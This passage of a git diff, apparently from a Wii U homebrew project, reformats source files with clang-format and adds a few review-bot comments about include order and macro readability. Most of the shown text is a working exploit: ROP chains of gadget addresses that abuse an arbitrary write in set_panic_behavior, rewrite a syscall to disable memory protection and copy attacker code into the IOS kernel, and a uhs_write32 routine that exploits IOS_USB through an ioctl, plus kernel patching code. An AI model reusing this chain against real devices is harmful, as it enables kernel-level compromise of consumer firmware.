R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0xCC + 0x0, // 0xD0 + 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) + 0x0, // 0xD8 + 0x0, // 0xDC + 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, 
C0, #0 (set dacr to R0) - 0x0, // 0xEC - 0x10123a8b, // 0xF0 POP {R3,R4,PC} - 0x1, // 0xF4 R3 must be 1 for the arbitrary write - 0x0, // 0xF8 - 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x100 - 0x0, // 0x104 - 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) - 0x0, // 0x10C - 0x0, // 0x110 - 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} + 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) + 0x0, // 0xEC + 0x10123a8b, // 0xF0 POP {R3,R4,PC} + 0x1, // 0xF4 R3 must be 1 for the arbitrary write + 0x0, // 0xF8 + 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x100 + 0x0, // 0x104 + 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) + 0x0, // 0x10C + 0x0, // 0x110 + 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A00004, // 0x11C value: MOV R0, R4 - 0x0, // 0x120 - 0x10123a8b, // 0x124 POP {R3,R4,PC} - 0x1, // 0x128 R3 must be 1 for the arbitrary write - 0x0, // 0x12C - 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x134 - 0x0, // 0x138 - 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) - 0x0, // 0x140 - 0x0, // 0x144 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0xE1A00004, // 0x11C value: MOV R0, R4 + 0x0, // 0x120 + 0x10123a8b, // 0x124 POP {R3,R4,PC} + 0x1, // 0x128 R3 must be 1 for the arbitrary write + 0x0, // 0x12C + 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x134 + 0x0, // 0x138 + 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) + 0x0, // 0x140 + 0x0, // 0x144 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 
- 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x00000000, // 0x150 value: NOP - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0x00000000, // 0x150 value: NOP + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior 
(arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x1AFFFFFD, // 0x150 value: BNE clean_loop - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0x1AFFFFFD, // 0x150 value: BNE clean_loop + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + 0xEE070F9A, // 0x150 value: MCR 
p15, 0, R0, c7, c10, 4 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A03004, // 0x184 value: MOV R3, R4 - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + 0xE1A03004, // 0x184 value: MOV R3, R4 + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE8BD4010, // 0x184 value: POP {R4,LR} - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} + 0xE8BD4010, // 0x184 value: POP {R4,LR} + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, 
R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) - 0x0, // 0x1BC - 0x10123a8b, // 0x1C0 POP {R3,R4,PC} - 0x1, // 0x1C4 R3 must be 1 for the arbitrary write - 0x0, // 0x1C8 - 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x1D0 - 0x0, // 0x1D4 - 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} + 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) + 0x0, // 0x1BC + 0x10123a8b, // 0x1C0 POP {R3,R4,PC} + 0x1, // 0x1C4 R3 must be 1 for the arbitrary write + 0x0, // 0x1C8 + 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x1D0 + 0x0, // 0x1D4 + 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) + 0x0, // 0x1DC + 0x0, // 0x1E0 + 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64 - 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches - 0x0, // 0x1E0 - 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - ARM_CODE_BASE, // 0x1E8 our code destination address - 0x0, // 0x1EC - 0x0, // 0x1F0 - 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} - 0x0, // 0x1F8 - sizeof(ios_kernel),// 0x1FC our code size - 0x0, // 0x200 - 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} - 0x00140000, // 0x208 our code source location - 0x08131D04, // 0x20C KERNEL_MEMCPY address - 0x0, // 0x210 - 0x0, // 0x214 - 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) + 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches + 0x0, // 0x1E0 + 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) + 0x0, 
// 0x1DC
+ 0x0, // 0x1E0
+ 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
+ ARM_CODE_BASE, // 0x1E8 our code destination address
+ 0x0, // 0x1EC
+ 0x0, // 0x1F0
+ 0x101063db, // 0x1F4 POP {R1,R2,R5,PC}
+ 0x0, // 0x1F8
+ sizeof(ios_kernel), // 0x1FC our code size
+ 0x0, // 0x200
+ 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC}
+ 0x00140000, // 0x208 our code source location
+ 0x08131D04, // 0x20C KERNEL_MEMCPY address
+ 0x0, // 0x210
+ 0x0, // 0x214
+ 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot)
 0x0, 0x0, 0x101312D0, };
 static const int second_chain[] = {
- 0x10123a9f, // 0x00 POP {R0,R1,R4,PC}
- CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination
- 0x0, // 0x08
- 0x0, // 0x0C
- 0x101063db, // 0x10 POP {R1,R2,R5,PC}
- 0x00130000, // 0x14 source
- sizeof(final_chain), // 0x18 length
- 0x0, // 0x1C
- 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
- 0x0, // 0x24
- 0x0, // 0x28
- 0x101236f3, // 0x2C POP {R1-R7,PC}
- 0x0, // 0x30 arg
- 0x101001DC, // 0x34 stackptr
- 0x68, // 0x38 stacksize
- 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
- 0x0, // 0x40
- 0x0, // 0x44
- 0x0, // 0x48
- 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
- 0x0, // 0x50
- 0x0, // 0x54
- 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
- 0x0, // 0x5C
- 0x0, // 0x60
- IOS_CREATETHREAD, // 0x64
- 0x1, // 0x68 priority
- 0x2, // 0x6C flags
- 0x0, // 0x70
- 0x0, // 0x74
- 0x101063db, // 0x78 POP {R1,R2,R5,PC}
- 0x0, // 0x7C
- -(0x240 + 0x18 + 0xF000), // 0x80 stack offset
- 0x0, // 0x84
- 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC}
+ 0x10123a9f, // 0x00 POP {R0,R1,R4,PC}
+ CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination
+ 0x0, // 0x08
+ 0x0, // 0x0C
+ 0x101063db, // 0x10 POP {R1,R2,R5,PC}
+ 0x00130000, // 0x14 source
+ sizeof(final_chain), // 0x18 length
+ 0x0, // 0x1C
+ 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
+ 0x0, // 0x24
+ 0x0, // 0x28
+ 0x101236f3, // 0x2C POP {R1-R7,PC}
+ 0x0, // 0x30 arg
+ 0x101001DC, // 0x34 stackptr
+ 0x68, // 0x38 stacksize
+ 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
+ 0x0, // 0x40
+ 0x0, // 0x44
+ 0x0, // 0x48
+ 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
+ 0x0, // 0x50
+ 0x0, // 0x54
+ 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
+ 0x0, // 0x5C
+ 0x0, // 0x60
+ IOS_CREATETHREAD, // 0x64
+ 0x1, // 0x68 priority
+ 0x2, // 0x6C flags
+ 0x0, // 0x70
+ 0x0, // 0x74
+ 0x101063db, // 0x78 POP {R1,R2,R5,PC}
+ 0x0, // 0x7C
+ -(0x240 + 0x18 + 0xF000), // 0x80 stack offset
+ 0x0, // 0x84
+ 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC}
 0x0, 0x0, 0x0, 0x00110000 - 0x44, // 0x8C
 0x00110010, // 0x90
- 0x0, // 0x94
- 0x0, // 0x98
- 0x0, // 0x9C
- 0x0, // 0xA0
- 0x0, // 0xA4
- 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack
- 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC}
+ 0x0, // 0x94
+ 0x0, // 0x98
+ 0x0, // 0x9C
+ 0x0, // 0xA0
+ 0x0, // 0xA4
+ 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack
+ 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC}
 0x0, 0x0, 0x1012EA68, // 0xAC stack pivot
@@ -305,7 +305,7 @@ static void uhs_exploit_init(int dev_uhs_0_handle) {
 memcpy((char *) (0xF4140000), ios_kernel, sizeof(ios_kernel));
 payload_info_t *payloads = (payload_info_t *) 0xF4148000;
- payloads->size = sizeof(ios_usb);
+ payloads->size = sizeof(ios_usb);
 memcpy(payloads->data, ios_usb, payloads->size);
 pretend_root_hub[33] = 0x500000;
@@ -319,10 +319,10 @@ static void uhs_exploit_init(int dev_uhs_0_handle) {
 }
 static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) {
- ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes
- DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress)
- OSSleepTicks(0x200000); //! Improves stability
- int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
+ ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes
+ DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress)
+ OSSleepTicks(0x200000); //! Improves stability
+ int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
 int output_buffer[32];
 return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
 }
diff --git a/source/ios_kernel/source/elf_abi.h b/source/ios_kernel/source/elf_abi.h
index 4d9c796..aa119af 100644
--- a/source/ios_kernel/source/elf_abi.h
+++ b/source/ios_kernel/source/elf_abi.h
@@ -1,3 +1,4 @@
+// clang-format off
 /*
 * Copyright (c) 1995, 1996, 2001, 2002
 * Erik Theisen. All rights reserved.
diff --git a/source/ios_kernel/source/elf_patcher.c b/source/ios_kernel/source/elf_patcher.c
index 45faa91..2b33733 100644
--- a/source/ios_kernel/source/elf_patcher.c
+++ b/source/ios_kernel/source/elf_patcher.c
@@ -21,16 +21,14 @@
 * 3. This notice may not be removed or altered from any source
 * distribution.
 ***************************************************************************/
-#include "types.h"
 #include "elf_abi.h"
+#include "types.h"
 #include "utils.h"
 static Elf32_Phdr *get_section(u32 data, u32 vaddr) {
 Elf32_Ehdr *ehdr = (Elf32_Ehdr *) data;
- if (!IS_ELF (*ehdr)
- || (ehdr->e_type != ET_EXEC)
- || (ehdr->e_machine != EM_ARM)) {
+ if (!IS_ELF(*ehdr) || (ehdr->e_type != ET_EXEC) || (ehdr->e_machine != EM_ARM)) {
 return 0;
 }
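Review bot: Moving `#include "types.h"` below `#include "elf_abi.h"` in elf_patcher.c changes the order in which the headers are seen, and if elf_abi.h is not self-contained (it now comes first and would need whatever types.h provides, such as the `u32` used by get_section) the file only builds by accident of what elf_abi.h happens to pull in itself. The same include re-sort is applied in instant_patches.c, kernel_patches.c, ios_kernel main.c, source/main.cpp and utils/logger.h. Either confirm that each header compiles on its own or pin the previous order with `SortIncludes: false` in .clang-format, so that a later format pass cannot silently reorder them again.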
diff --git a/source/ios_kernel/source/elf_patcher.h b/source/ios_kernel/source/elf_patcher.h
index 1be026f..b860b44 100644
--- a/source/ios_kernel/source/elf_patcher.h
+++ b/source/ios_kernel/source/elf_patcher.h
@@ -26,10 +26,10 @@
 #include "types.h"
-#define ARM_B(addr, func) (0xEA000000 | ((((u32)(func) - (u32)(addr) - 8) >> 2) & 0x00FFFFFF)) // +-32MB
-#define ARM_BL(addr, func) (0xEB000000 | ((((u32)(func) - (u32)(addr) - 8) >> 2) & 0x00FFFFFF)) // +-32MB
-#define THUMB_B(addr, func) ((0xE000 | ((((u32)(func) - (u32)(addr) - 4) >> 1) & 0x7FF))) // +-2KB
-#define THUMB_BL(addr, func) ((0xF000F800 | ((((u32)(func) - (u32)(addr) - 4) >> 1) & 0x0FFF)) | ((((u32)(func) - (u32)(addr) - 4) << 4) & 0x7FFF000)) // +-4MB
+#define ARM_B(addr, func) (0xEA000000 | ((((u32) (func) - (u32) (addr) -8) >> 2) & 0x00FFFFFF)) // +-32MB
+#define ARM_BL(addr, func) (0xEB000000 | ((((u32) (func) - (u32) (addr) -8) >> 2) & 0x00FFFFFF)) // +-32MB
+#define THUMB_B(addr, func) ((0xE000 | ((((u32) (func) - (u32) (addr) -4) >> 1) & 0x7FF))) // +-2KB
+#define THUMB_BL(addr, func) ((0xF000F800 | ((((u32) (func) - (u32) (addr) -4) >> 1) & 0x0FFF)) | ((((u32) (func) - (u32) (addr) -4) << 4) & 0x7FFF000)) // +-4MB
 typedef struct {
 u32 address;
diff --git a/source/ios_kernel/source/instant_patches.c b/source/ios_kernel/source/instant_patches.c
index 582fbca..8cefefe 100644
--- a/source/ios_kernel/source/instant_patches.c
+++ b/source/ios_kernel/source/instant_patches.c
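Review bot: The reformatted branch macros now read `(u32) (addr) -8`, which a reader parses as a cast followed by a unary minus, although the preprocessor still expands it as the binary subtraction `(u32)(addr) - 8` the old lines spelled out; the `mcp_rodata_phys`/`mcp_data_phys`/`acp_phys` macros in instant_patches.c get the same `(u32) (addr) -0x...` rendering, and the function-pointer casts in ios_kernel utils.h come out with a stray `) )`. Because these macros compute branch displacements and physical addresses for in-memory patches, misreading the sign is an easy way to introduce a wrong patch in a later edit. Wrap these macro groups in `// clang-format off` / `// clang-format on`, as this commit already does for the byte tables in elf_abi.h and ios_kernel main.c, so the formatter leaves them in their readable form.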
@@ -21,17 +21,17 @@
 * 3. This notice may not be removed or altered from any source
 * distribution.
 ***************************************************************************/
-#include "utils.h"
-#include "types.h"
 #include "kernel_patches.h"
+#include "types.h"
+#include "utils.h"
-#define mcp_rodata_phys(addr) ((u32)(addr) - 0x05060000 + 0x08220000)
-#define mcp_data_phys(addr) ((u32)(addr) - 0x05074000 + 0x08234000)
-#define acp_phys(addr) ((u32)(addr) - 0xE0000000 + 0x12900000)
+#define mcp_rodata_phys(addr) ((u32) (addr) -0x05060000 + 0x08220000)
+#define mcp_data_phys(addr) ((u32) (addr) -0x05074000 + 0x08234000)
+#define acp_phys(addr) ((u32) (addr) -0xE0000000 + 0x12900000)
 void instant_patches_setup(void) {
 // fix 10 minute timeout that crashes MCP after 10 minutes of booting
- *(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT
+ *(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT
 // patch default title id to system menu
 *(volatile u32 *) mcp_data_phys(0x050B817C) = *(volatile u32 *) 0x0017FFF0;
diff --git a/source/ios_kernel/source/kernel_patches.c b/source/ios_kernel/source/kernel_patches.c
index 322ab25..b306957 100644
--- a/source/ios_kernel/source/kernel_patches.c
+++ b/source/ios_kernel/source/kernel_patches.c
@@ -21,9 +21,9 @@
 * 3. This notice may not be removed or altered from any source
 * distribution.
 ***************************************************************************/
-#include "types.h"
-#include "elf_patcher.h"
 #include "kernel_patches.h"
+#include "elf_patcher.h"
+#include "types.h"
 #include "utils.h"
 extern void __KERNEL_CODE_START(void);
@@ -34,7 +34,7 @@ void kernel_launch_ios(u32 launch_address, u32 L, u32 C, u32 H) {
 void (*kernel_launch_bootrom)(u32 launch_address, u32 L, u32 C, u32 H) = (void *) 0x0812A050;
 if (*(u32 *) (launch_address - 0x300 + 0x1AC) == 0x00DFD000) {
- int level = disable_interrupts();
+ int level = disable_interrupts();
 unsigned int control_register = disable_mmu();
 u32 ios_elf_start = launch_address + 0x804 - 0x300;
@@ -58,4 +58,3 @@ void kernel_run_patches(u32 ios_elf_start) {
 section_write_word(ios_elf_start, 0xe22b2a78, 0x00000000);
 section_write_word(ios_elf_start, 0xe204fb68, 0xe3a00000);
 }
-
diff --git a/source/ios_kernel/source/main.c b/source/ios_kernel/source/main.c
index b929231..213ea45 100644
--- a/source/ios_kernel/source/main.c
+++ b/source/ios_kernel/source/main.c
@@ -21,17 +21,18 @@
 * 3. This notice may not be removed or altered from any source
 * distribution.
 ***************************************************************************/
+#include "instant_patches.h"
 #include "types.h"
 #include "utils.h"
-#include "instant_patches.h"
-#define USB_PHYS_CODE_BASE 0x101312D0
+#define USB_PHYS_CODE_BASE 0x101312D0
 typedef struct {
 u32 size;
 u8 data[0];
 } payload_info_t;
+// clang-format off
 static const char repairData_set_fault_behavior[] = {
 0xE1, 0x2F, 0xFF, 0x1E, 0xE9, 0x2D, 0x40, 0x30, 0xE5, 0x93, 0x20, 0x00, 0xE1, 0xA0, 0x40, 0x00, 0xE5, 0x92, 0x30, 0x54, 0xE1, 0xA0, 0x50, 0x01, 0xE3, 0x53, 0x00, 0x01, 0x0A, 0x00, 0x00, 0x02,
@@ -55,11 +56,12 @@ static const char repairData_usb_root_thread[] = {
 0xE2, 0x4D, 0xDE, 0x17, 0xEB, 0x00, 0xB9, 0x92, 0xE3, 0xA0, 0x10, 0x00, 0xE3, 0xA0, 0x20, 0x03, 0xE5, 0x9F, 0x0E, 0x68, 0xEB, 0x00, 0xB3, 0x20,
 };
+// clang-format on
 int _main() {
- void (*invalidate_icache)() = (void (*)()) 0x0812DCF0;
+ void (*invalidate_icache)() = (void (*)()) 0x0812DCF0;
 void (*invalidate_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120164;
- void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160;
+ void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160;
 flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache
diff --git a/source/ios_kernel/source/utils.c b/source/ios_kernel/source/utils.c
index 03cd42f..a1b1b42 100644
--- a/source/ios_kernel/source/utils.c
+++ b/source/ios_kernel/source/utils.c
@@ -30,7 +30,7 @@ void reverse_memcpy(void *dst, const void *src, unsigned int size) {
 if ((size >= 4) && !((dst - src) & 3)) {
 const unsigned int *src_p32;
 unsigned int *dst_p32;
- unsigned int endDst = ((unsigned int) dst) + size;
+ unsigned int endDst = ((unsigned int) dst) + size;
 unsigned int endRest = endDst & 3;
 if (endRest) {
diff --git a/source/ios_kernel/source/utils.h b/source/ios_kernel/source/utils.h
index 6a83e9d..d905625 100644
--- a/source/ios_kernel/source/utils.h
+++ b/source/ios_kernel/source/utils.h
@@ -24,30 +24,37 @@
 #ifndef _UTILS_H
 #define _UTILS_H
-#define ALIGN4(x) (((x) + 3) & ~3)
+#define ALIGN4(x) (((x) + 3) & ~3)
-#define kernel_memcpy ((void * (*)(void*, const void*, int))0x08131D04)
-#define kernel_memset ((void *(*)(void*, int, unsigned int))0x08131DA0)
-#define kernel_strncpy ((char *(*)(char*, const char*, unsigned int))0x081329B8)
-#define disable_interrupts ((int(*)())0x0812E778)
-#define enable_interrupts ((int(*)(int))0x0812E78C)
-#define kernel_bsp_command_5 ((int (*)(const char*, int offset, const char*, int size, void *buffer))0x0812EC40)
+#define kernel_memcpy ((void *(*) (void *, const void *, int) ) 0x08131D04)
+#define kernel_memset ((void *(*) (void *, int, unsigned int) ) 0x08131DA0)
+#define kernel_strncpy ((char *(*) (char *, const char *, unsigned int) ) 0x081329B8)
